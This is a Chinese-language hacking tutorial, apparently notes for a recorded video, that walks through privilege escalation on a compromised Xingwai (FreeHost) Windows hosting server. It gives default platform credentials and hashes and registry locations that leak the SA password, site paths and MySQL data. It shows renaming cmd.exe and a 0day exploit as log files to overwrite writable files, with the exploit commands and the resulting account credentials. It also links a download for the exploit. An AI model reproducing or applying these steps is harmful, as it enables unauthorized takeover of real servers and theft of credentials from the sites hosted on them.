錄制個提取服務(wù)器視頻 其實服務(wù)器我已經(jīng)拿下了 不過

有可看的地方??

星外 找不到可讀可寫目錄 提權(quán)服務(wù)器

拒絕訪問。

星外提權(quán)就是找可讀可寫目錄

?

才有可能找到可執(zhí)行目錄

上傳了cmd了 之前?

C:\windows\temp\Cookies\CMD.EXE

拒絕訪問。

找遍了 目錄沒有找到可執(zhí)行的目錄?

這個時候可以試這找? log日記

先說兩個要點

這個是星外的服務(wù)器 一看就可以知道

d:\freehost\

可以嘗試星外默認(rèn)帳號密碼登錄服務(wù)器

星外默認(rèn)帳號密碼

freehostrunat??

fa41328538d7be36e83ae91a78a1b16f!7

2找星外的sa密碼保存處? 經(jīng)常破不出? 就算破出來了經(jīng)常連不上?

HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFreeHost\11

sa密碼? ab9b161c79fbea5e44c1c78ec4821f96

找另一個泄漏? 其他網(wǎng)站的物理路徑的注冊表位置

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\

這個有時候自然有用的?

給大家看一片文章 地址 ：提權(quán)服務(wù)器的 配合這個好用

http://keio2.***.com/? qita工具? ?記一次提權(quán).doc 867KB??

自己看下吧 對自己提權(quán)服務(wù)器有幫助的

還有一個度注冊表 獲取mysql的路徑? 如果服務(wù)器開了3306端口可以

考慮下載mysql的root密碼 也可以在asp大馬的 程序 位置下載快捷方式獲得路徑

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\MySQL Server 5.0\

對路徑“E:\Program Files\MySQL\MySQL Server 5.0”的訪問被拒絕。

說道這里 現(xiàn)在繼續(xù)說

目錄沒有找到可執(zhí)行的目錄 提權(quán)服務(wù)器?

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\

這個目錄雖說沒有?

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\ 可以讀 不可寫?

是不可以上傳文件的 但我們可以嘗試上傳log.csv 覆蓋 這個是可以的

將cmd改名為 log.csv上傳是可以上傳上去的

這個log.csv是我改名的cmd上傳覆蓋掉原先的 log.csv

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

這樣可以執(zhí)行cmd了?

但是無法執(zhí)行我們的提權(quán)exp

所以繼續(xù)找log日記

hchiblis.ibl? 這個和前面一樣?

將提權(quán)的exp? 我用的星外 oday? ee.exe

是可以覆蓋上傳的

?hchiblis.ibl 2012-06-29 05:27:49 10.00??

星外的ee.exe下載地址?

/c c://windows/hchiblis.ibl?

c://windows/hchiblis.ibl -i

/c c://windows/hchiblis.ibl -u 724?

UserName:freehostrunat

Password:1a1b076a19155ffdc86365fa95bcfbba!7

成功提權(quán)服務(wù)器

http://keio2.cccpan.com/? qita工具? 星外ee.rar 5KB[編輯]

汗? 演示完了?

02a7dab3036847c0

www.***.com? 這個站和之前那個是同一個服務(wù)器 目標(biāo)站是這個站 連接3389網(wǎng)站